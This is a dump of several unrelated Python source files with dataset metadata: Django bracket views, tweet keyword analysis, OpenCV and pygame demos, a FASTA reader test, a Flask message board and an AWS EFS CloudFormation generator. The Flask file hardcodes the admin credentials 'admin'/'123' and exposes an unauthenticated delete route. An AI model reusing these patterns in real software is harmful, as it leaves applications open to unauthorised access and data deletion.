else:\n grid[y][r] = Cell()\n # grid[y][r] = (y + 1, int(y + math.pow(2, i) + 1)) if y % math.pow(2, i + 1) == (math.pow(2, i) - 1) else Cell()\n\n # this one places fork like a letter T on the left side\n for r in range(1, width, 2):\n i = (r + 1) / 2\n grid[y][r] = Cell(a[0], 'color: red;') if (y % math.pow(2, i + 1) == math.pow(2, i) - 1) else Cell()\n\n # this one places upper or down corner\n for r in range(1, width, 2):\n i = (r - 1) / 2\n if y % math.pow(2, i + 1) == math.pow(2, i) - 1:\n grid[y][r] = Cell(a[2], 'color: red;') if (y % math.pow(2, i + 2) == math.pow(2, i) - 1) else Cell(a[1], 'color: red;')\n\n # this piece of code creates part of arrows |\n for r in range(3, width, 2):\n i = (r - 1) / 2\n if y % math.pow(2, i + 2) != (math.pow(2, i + 1) - 1) and (math.pow(2, i) - 1) < y % math.pow(2, i + 2) < (math.pow(2, i + 2) - math.pow(2, i) - 1):\n grid[y][r] = Cell(a[3], 'color: red;')\n return grid, width\n\n\ndef tournament_template(request, *args):\n num = int(args[0]) if len(args) == 1 else 8\n if num < 3:\n raise Http404\n # number of players\n grid, width = grid_gen(num)\n\n return render_to_response('tournaments/standing.html', {'width': width, 'grid': grid}, context_instance=RequestContext(request))\n\n\ndef information(request, thash=None):\n tourn = get_object_or_404(Tournament, thash=thash)\n return render_to_response(\"tournaments/info.html\", locals(), RequestContext(request))\n\n\ndef results(request, thash):\n tourn = get_object_or_404(Tournament, thash=thash)\n parts = tourn.tournamentparticipant_set.order_by('order').all()\n names = []\n\n for p in parts:\n names.append(p)\n grid, width = grid_gen(tourn.npart + 1, names)\n\n parts_js = []\n for p in parts: #tourn.tournamentparticipant_set.order_by('participant__name').all():\n parts_js.append('{value: %s, text: \"%s\"}' % (p.id, p.participant.name))\n parts_js=', '.join(parts_js)\n\n return render_to_response(\"tournaments/standing2.html\", locals(), RequestContext(request))\n\n\ndef profile(request):\n return None", "sub_path": "kickme/tournament/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 12175, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.http.HttpResponseBadRequest", "line_number": 38, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 47, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 51, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 64, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 68, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 68, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 72, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 72, "usage_type": "call"}, {"api_name": "social_auth.db.django_models", "line_number": 77, "usage_type": "name"}, {"api_name": "social_auth.db.django_models.UserSocialAuth.get_social_auth_for_user", "line_number": 77, "usage_type": "call"}, {"api_name": "social_auth.db.django_models.UserSocialAuth", "line_number": 77, "usage_type": "name"}, {"api_name": "social_auth.db.django_models", "line_number": 78, "usage_type": "name"}, {"api_name": "social_auth.db.django_models", "line_number": 86, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 95, "usage_type": "call"}, {"api_name": "social_auth.db.django_models", "line_number": 98, "usage_type": "name"}, {"api_name": "django.template.context.RequestContext", "line_number": 102, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 75, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 110, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 125, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 127, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 106, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 133, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 140, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 143, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 149, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 149, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 153, "usage_type": "call"}, {"api_name": "django.db.models.Max", "line_number": 165, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 168, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 168, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 170, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 170, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 170, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 173, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 173, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 177, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 185, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 192, "usage_type": "call"}, {"api_name": "django.http.HttpResponseForbidden", "line_number": 195, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 210, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 210, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 215, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 215, "usage_type": "call"}, {"api_name": "django.views.decorators.http.require_POST", "line_number": 189, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 221, "usage_type": "call"}, {"api_name": "django.http.HttpResponseForbidden", "line_number": 224, "usage_type": "name"}, {"api_name": "django.http.HttpResponseNotFound", "line_number": 231, "usage_type": "name"}, {"api_name": "django.http.HttpResponseForbidden", "line_number": 233, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 236, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 236, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 241, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 241, "usage_type": "call"}, {"api_name": "django.views.decorators.http.require_POST", "line_number": 218, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 265, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 267, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 273, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 274, "usage_type": "call"}, {"api_name": "math.log", "line_number": 274, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 275, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 300, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 303, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 313, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 318, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 319, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 324, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 332, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 336, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 336, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 340, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 341, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 341, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 345, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 358, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 358, "usage_type": "call"}]} +{"seq_id": "347656205", "text": "import json\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport re\n\ntweets_data_path = '1_18.txt'\ntweets_data = []\ntweets_file = open(tweets_data_path, \"r\")\n\nfor line in tweets_file:\n try:\n tweet = json.loads(line)\n tweets_data.append(tweet)\n except:\n continue\n\ntweets = pd.DataFrame()\ntweets['text'] = [tweet.get('text','') for tweet in tweets_data]\ntweets['lang'] = [tweet.get('lang','') for tweet in tweets_data]\n#for i in tweets['text']:\n#if tweet['place'] == None:\n # tweets['country'] = None\n#else:\n # tweets['country'] = [tweet['place'].get('country', '') for tweet in tweets_data]\n#else: None\n #else:\n # tweets['country'][i]= [tweet['place'][i].get('country', '') for tweet in tweets_data]\ntweets['time'] = [tweet.get('created_at','') for tweet in tweets_data]\n#tweets['user'] = [tweet.get('screen_name', '') for tweet in tweets_data]\n#tweets['user_id'] = [tweet.get('id', '') for tweet in tweets_data]\n#tweets['user_followers'] = [tweet.get('followers_count', '') for tweet in tweets_data]\n\n#print tweets['lang'].value_counts()\n\n\n# fig, ax = plt.subplots()\n# ax.tick_params(axis='x', labelsize=15)\n# ax.tick_params(axis='y', labelsize=10)\n# ax.set_xlabel('Languages', fontsize=15)\n# ax.set_ylabel('Number of tweets' , fontsize=15)\n# ax.set_title('Top 5 languages', fontsize=15, fontweight='bold')\n# tweets_by_lang[:5].plot(ax=ax, kind='bar', color='red')\n# plt.show()\n\ndef word_in_text(word, text):\n word = word.lower()\n text = text.lower()\n match = re.search(word, text)\n if match:\n return True\n return False\n\n\ntweets['corn'] = tweets['text'].apply(lambda tweet: word_in_text('corn', tweet))\ntweets['soybean'] = tweets['text'].apply(lambda tweet: word_in_text('soybean', tweet))\ntweets['wheat'] = tweets['text'].apply(lambda tweet: word_in_text('wheat', tweet))\n\n#print tweets['corn'].value_counts()[True]\n#print tweets['soybean'].value_counts()[True]\n#print tweets['wheat'].value_counts()[True]\n\ndef extract_link(text):\n regex = r'https?://[^\\s<>\"]+|www\\.[^\\s<>\"]+'\n match = re.search(regex, text)\n if match:\n return match.group()\n return ''\n\n\ntweets['link'] = tweets['text'].apply(lambda tweet: extract_link(tweet))\n\ntweets_soybean = tweets[tweets['soybean'] == True]\ntweets_soybean_with_link = tweets_soybean[tweets_soybean['link'] != '']\ntweets_corn = tweets[tweets['corn'] == True]\ntweets_corn_with_link = tweets_corn[tweets_corn['link'] != '']\ntweets_wheat = tweets[tweets['wheat'] == True]\ntweets_wheat_with_link = tweets_wheat[tweets_wheat['link'] != '']\n\ntweets_with_link = {'soybean': tweets_soybean_with_link,\n 'corn': tweets_corn_with_link,\n 'wheat': tweets_wheat_with_link}\n\n#print tweets_with_link['corn'][-5:]['link']\n\n#tweets.to_pickle('tweets.txt')\n#tweets.to_excel('path_to_file.xlsx', sheet_name='Sheet1')\n\n#from pandas import ExcelWriter\n#writer = ExcelWriter('output.xlsx')\n#tweets.to_excel(writer,'Sheet1')\n#df2.to_excel(writer,'Sheet2')\n#writer.save()\n\n", "sub_path": "granstweets4.py", "file_name": "granstweets4.py", "file_ext": "py", "file_size_in_byte": 3012, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.loads", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 17, "usage_type": "call"}, {"api_name": "re.search", "line_number": 48, "usage_type": "call"}, {"api_name": "re.search", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "104589461", "text": "import numpy as np \r\nimport cv2\r\n\r\n#Displaying a circle.\r\npic=np.zeros((500,500,3),dtype='uint8')\r\ncolor=(255,0,255)\r\ncv2.circle(pic,(250,250),50,color)\r\ncv2.imshow('dark',pic)\r\ncv2.waitKey(5000)\r\ncv2.destroyAllWindows()\r\n", "sub_path": "circle.py", "file_name": "circle.py", "file_ext": "py", "file_size_in_byte": 222, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.zeros", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "431145463", "text": "import pygame\nfrom random import randint\nimport misc\n\n# List of the [x, y] coordinates of existing holes\nhole_locations = []\n\n\nclass Hole(pygame.sprite.Sprite):\n \"\"\"\n Holes: The ants portal to the underworld\n \"\"\"\n def __init__(self, at_mouse=False):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"images/hole01a.png\")\n self.rect = self.image.get_rect()\n if at_mouse: # Add hole at mouse location\n pos = misc.get_mouse_loc()\n # Set new top left coordinates\n self.rect.x, self.rect.y = pos[0] - 30, pos[1] - 30\n else:\n self.rect.x, self.rect.y = get_valid_hole_location()\n global hole_locations\n # Add new coordinates to list\n hole_locations.append([self.rect.x, self.rect.y])\n\n\ndef get_valid_hole_location():\n \"\"\"\n Run through hole_locations in search for a new valid hole location\n :return: The valid x and y coordinates\n \"\"\"\n valid_location = False # First assume the location is not valid\n x = 0\n y = 0\n\n while not valid_location: # Loop while coordinates not valid\n # Count to check the new hole is valid for all existing holes\n valid_count = 0\n x = randint(1, 838) # Generate random x\n y = randint(1, 538) # And random y\n for hole_loc in hole_locations: # For each hole\n # If new hole is to the left of, or above the existing hole\n if x < hole_loc[0] - 61 or y < hole_loc[1] - 61:\n valid_count += 1\n # Else if new hole doesn't overlap existing hole\n elif not (x < hole_loc[0] + 61 and y < hole_loc[1] + 61):\n valid_count += 1\n # If coordinates are valid for every existing hole\n if valid_count == len(hole_locations):\n valid_location = True\n return x, y # Return coordinates x and y\n", "sub_path": "ants/classes/hole_class.py", "file_name": "hole_class.py", "file_ext": "py", "file_size_in_byte": 1890, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pygame.sprite", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 15, "usage_type": "attribute"}, {"api_name": "misc.get_mouse_loc", "line_number": 18, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 40, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "318100191", "text": "#!/usr/bin/env python\n# coding=utf-8\n\nimport io\nimport unittest\n\nfrom src.fasta_reader import FastaReader\n\n\nclass TestFastaReader(unittest.TestCase):\n def setUp(self):\n self.reader = FastaReader()\n\n def test_read(self):\n no_line_breaks = io.BytesIO('>seq_1\\nGATTACAGATTACAGATTACAGATTACAGATTACAGATTACAGATTACAGATTACA\\n' +\n '>seq_2\\nNNNNNNNNGATTACAGATTACAGATTACANNNNNNNNNNN')\n line_breaks = io.BytesIO('>seq_1\\nGATTACAGATTACAGATTACAGATTACA\\nGATTACAGATTACAGATTACAGATTACA\\n' +\n '>seq_2\\nNNNNNNNNGATTACAGATTACAGATTAC\\nANNNNNNNNNNN')\n\n self.reader.read(no_line_breaks)\n self.assertEquals(2, len(self.reader.seqs))\n self.assertEquals('seq_1', self.reader.seqs[0].header)\n self.assertEquals('GATTACAGATTACAGATTACAGATTACAGATTACAGATTACAGATTACAGATTACA', self.reader.seqs[0].bases)\n self.assertEquals('seq_2', self.reader.seqs[1].header)\n self.assertEquals('NNNNNNNNGATTACAGATTACAGATTACANNNNNNNNNNN', self.reader.seqs[1].bases)\n self.reader.read(line_breaks)\n self.assertEquals(4, len(self.reader.seqs))\n self.assertEquals('NNNNNNNNGATTACAGATTACAGATTACANNNNNNNNNNN', self.reader.seqs[3].bases)\n\n\ndef suite():\n _suite = unittest.TestSuite()\n _suite.addTest(unittest.makeSuite(TestFastaReader))\n return _suite\n\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "test/fasta_reader_tests.py", "file_name": "fasta_reader_tests.py", "file_ext": "py", "file_size_in_byte": 1410, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "src.fasta_reader.FastaReader", "line_number": 12, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 15, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 17, "usage_type": "call"}, {"api_name": "unittest.TestSuite", "line_number": 32, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 33, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "440569322", "text": "import time\nfrom flask import Flask, redirect, url_for, request, jsonify, render_template, session\nfrom models import * \nfrom app import *\n\ndef login_required(f):\n\t@wraps(f)\n\tdef wrap(*args, **kwargs):\n\t\tif 'is_admin' in session:\n\t\t\treturn f(*args, **kwargs)\n\t\telse:\n\t\t\treturn redirect(url_for('login'))\n\treturn wrap\n\n@app.route('/admin')\n@login_required\ndef admin():\n\ttab = 'admin'\n\treturn render_template('admin.html')\n\n@app.route('/messages')\ndef send_data():\n\tdata = get_msgs()\n\treturn json.dumps(data)\n\n@app.route('/addMsg', methods = [ 'POST'])\ndef addMsg():\n\t\n\tif request.method=='POST':\n\t\tif request.form['msg']!='':\n\t\t\tmsg = request.form['msg']\n\t\t\tinsert_msg(msg)\n\n\tlists = get_msgs()\n\treturn json.dumps(lists)\n\n\n@app.route(\"/\",methods = ['GET', 'POST'])\ndef home():\n\ttab = 'home'\n\treturn render_template(\"home.html\")\n\n@app.route('/about')\ndef about():\n\treturn render_template('about.html')\n\n\n@app.route('/delete/')\ndef delete_message(id):\n\t\n\tif request.method=='GET':\n\t\tdelete_msg(id)\n\n\tdata1 = get_msgs()\n\treturn json.dumps(data1)\n\n@app.route(\"/login\", methods=['GET','POST'])\ndef login():\n\terror=None\n\tif request.method=='POST':\n\t\tif request.form['username']!='admin' or request.form['pwd']!='123':\n\t\t\terror='Invalid credentials. Please try again!'\n\t\telse:\n\t\t\tsession['is_admin'] = True \n\t\t\treturn redirect(url_for('admin'))\n\treturn render_template(\"login.html\", error=error)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n\tsession.pop('is_admin', None)\n\treturn redirect(url_for('home'))", "sub_path": "views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1511, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask.session", "line_number": 9, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "app.route", "line_number": 15, "usage_type": "call"}, {"api_name": "app.route", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "app.route", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 41, "usage_type": "call"}, {"api_name": "app.route", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 45, "usage_type": "call"}, {"api_name": "app.route", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "app.route", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 61, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 66, "usage_type": "call"}, {"api_name": "app.route", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.session.pop", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 73, "usage_type": "call"}, {"api_name": "app.route", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "494596517", "text": "import argparse\nfrom troposphere import And, Condition, Equals, If, Not, NoValue, Output, Parameter, Ref, Select, Template\nfrom troposphere.efs import FileSystem, MountTarget\n\n\ndef main(args):\n t = Template()\n\n # [0 shared_dir, 1 efs_fs_id, 2 performance_mode, 3 efs_kms_key_id,\n # 4 provisioned_throughput, 5 encrypted, 6 throughput_mode, 7 exists_valid_head_node_mt, 8 exists_valid_compute_mt]\n efs_options = t.add_parameter(\n Parameter(\n \"EFSOptions\",\n Type=\"CommaDelimitedList\",\n Description=\"Comma separated list of efs related options, 9 parameters in total\",\n )\n )\n compute_security_group = t.add_parameter(\n Parameter(\"ComputeSecurityGroup\", Type=\"String\", Description=\"Security Group for Mount Target\")\n )\n head_node_subnet_id = t.add_parameter(\n Parameter(\"MasterSubnetId\", Type=\"String\", Description=\"Head node subnet id for head node mount target\")\n )\n compute_subnet_id = t.add_parameter(\n Parameter(\n \"ComputeSubnetId\",\n Type=\"String\",\n Description=\"User provided compute subnet id. Will be use to create compute mount target if needed.\",\n )\n )\n\n create_efs = t.add_condition(\n \"CreateEFS\",\n And(Not(Equals(Select(str(0), Ref(efs_options)), \"NONE\")), Equals(Select(str(1), Ref(efs_options)), \"NONE\")),\n )\n create_head_node_mt = t.add_condition(\n \"CreateMasterMT\",\n And(Not(Equals(Select(str(0), Ref(efs_options)), \"NONE\")), Equals(Select(str(7), Ref(efs_options)), \"NONE\")),\n )\n no_mt_in_compute_az = t.add_condition(\"NoMTInComputeAZ\", Equals(Select(str(8), Ref(efs_options)), \"NONE\"))\n use_user_provided_compute_subnet = t.add_condition(\n \"UseUserProvidedComputeSubnet\", Not(Equals(Ref(compute_subnet_id), \"NONE\"))\n )\n # Need to create compute mount target if:\n # user is providing a compute subnet and\n # there is no existing MT in compute subnet's AZ(includes case where head node AZ == compute AZ).\n #\n # If user is not providing a compute subnet, either we are using the head node subnet as compute subnet,\n # or we will be creating a compute subnet that is in the same AZ as head node subnet,\n # see ComputeSubnet resource in the main stack.\n # In both cases no compute MT is needed.\n create_compute_mt = t.add_condition(\n \"CreateComputeMT\", And(Condition(use_user_provided_compute_subnet), Condition(no_mt_in_compute_az))\n )\n\n use_performance_mode = t.add_condition(\"UsePerformanceMode\", Not(Equals(Select(str(2), Ref(efs_options)), \"NONE\")))\n use_efs_encryption = t.add_condition(\"UseEFSEncryption\", Equals(Select(str(5), Ref(efs_options)), \"true\"))\n use_efs_kms_key = t.add_condition(\n \"UseEFSKMSKey\", And(Condition(use_efs_encryption), Not(Equals(Select(str(3), Ref(efs_options)), \"NONE\")))\n )\n use_throughput_mode = t.add_condition(\"UseThroughputMode\", Not(Equals(Select(str(6), Ref(efs_options)), \"NONE\")))\n use_provisioned = t.add_condition(\"UseProvisioned\", Equals(Select(str(6), Ref(efs_options)), \"provisioned\"))\n use_provisioned_throughput = t.add_condition(\n \"UseProvisionedThroughput\",\n And(Condition(use_provisioned), Not(Equals(Select(str(4), Ref(efs_options)), \"NONE\"))),\n )\n\n fs = t.add_resource(\n FileSystem(\n \"EFSFS\",\n PerformanceMode=If(use_performance_mode, Select(str(2), Ref(efs_options)), NoValue),\n ProvisionedThroughputInMibps=If(use_provisioned_throughput, Select(str(4), Ref(efs_options)), NoValue),\n ThroughputMode=If(use_throughput_mode, Select(str(6), Ref(efs_options)), NoValue),\n Encrypted=If(use_efs_encryption, Select(str(5), Ref(efs_options)), NoValue),\n KmsKeyId=If(use_efs_kms_key, Select(str(3), Ref(efs_options)), NoValue),\n Condition=create_efs,\n )\n )\n\n t.add_resource(\n MountTarget(\n \"MasterSubnetEFSMT\",\n FileSystemId=If(create_efs, Ref(fs), Select(str(1), Ref(efs_options))),\n SecurityGroups=[Ref(compute_security_group)],\n SubnetId=Ref(head_node_subnet_id),\n Condition=create_head_node_mt,\n )\n )\n\n t.add_resource(\n MountTarget(\n \"ComputeSubnetEFSMT\",\n FileSystemId=If(create_efs, Ref(fs), Select(str(1), Ref(efs_options))),\n SecurityGroups=[Ref(compute_security_group)],\n SubnetId=Ref(compute_subnet_id),\n Condition=create_compute_mt,\n )\n )\n\n t.add_output(\n Output(\n \"FileSystemId\",\n Description=\"ID of the FileSystem\",\n Value=If(create_efs, Ref(fs), Select(\"1\", Ref(efs_options))),\n )\n )\n\n # Specify output file path\n json_file_path = args.target_path\n output_file = open(json_file_path, \"w\")\n output_file.write(t.to_json())\n output_file.close()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Take in generator related parameters\")\n parser.add_argument(\n \"--target-path\", type=str, help=\"The target path for generated substack template\", required=True\n )\n args = parser.parse_args()\n main(args)\n", "sub_path": "util/cfn-stacks-generators/generate-efs-substack.py", "file_name": "generate-efs-substack.py", "file_ext": "py", "file_size_in_byte": 5206, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "troposphere.Template", "line_number": 7, "usage_type": "call"}, {"api_name": "troposphere.Parameter", "line_number": 12, "usage_type": "call"}, {"api_name": "troposphere.Parameter", "line_number": 19, "usage_type": "call"}, {"api_name": "troposphere.Parameter", "line_number": 22, "usage_type": "call"}, {"api_name": "troposphere.Parameter", "line_number": 25, "usage_type": "call"}, {"api_name": "troposphere.And", "line_number": 34, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 34, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 34, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 34, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 34, "usage_type": "call"}, {"api_name": "troposphere.And", "line_number": 38, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 38, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 38, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 38, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 38, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 40, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 40, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 40, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 42, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 42, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 42, "usage_type": "call"}, {"api_name": "troposphere.And", "line_number": 53, "usage_type": "call"}, {"api_name": "troposphere.Condition", "line_number": 53, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 56, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 56, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 56, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 56, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 57, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 57, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 57, "usage_type": "call"}, {"api_name": "troposphere.And", "line_number": 59, "usage_type": "call"}, {"api_name": "troposphere.Condition", "line_number": 59, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 59, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 59, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 59, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 59, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 61, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 61, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 61, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 61, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 62, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 62, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 62, "usage_type": "call"}, {"api_name": "troposphere.And", "line_number": 65, "usage_type": "call"}, {"api_name": "troposphere.Condition", "line_number": 65, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 65, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 65, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 65, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 65, "usage_type": "call"}, {"api_name": "troposphere.efs.FileSystem", "line_number": 69, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 71, "usage_type": "call"}, {"api_name": "troposphere.NoValue", "line_number": 71, "usage_type": "argument"}, {"api_name": "troposphere.Select", "line_number": 71, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 71, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 72, "usage_type": "call"}, {"api_name": "troposphere.NoValue", "line_number": 72, "usage_type": "argument"}, {"api_name": "troposphere.Select", "line_number": 72, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 72, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 73, "usage_type": "call"}, {"api_name": "troposphere.NoValue", "line_number": 73, "usage_type": "argument"}, {"api_name": "troposphere.Select", "line_number": 73, "usage_type": 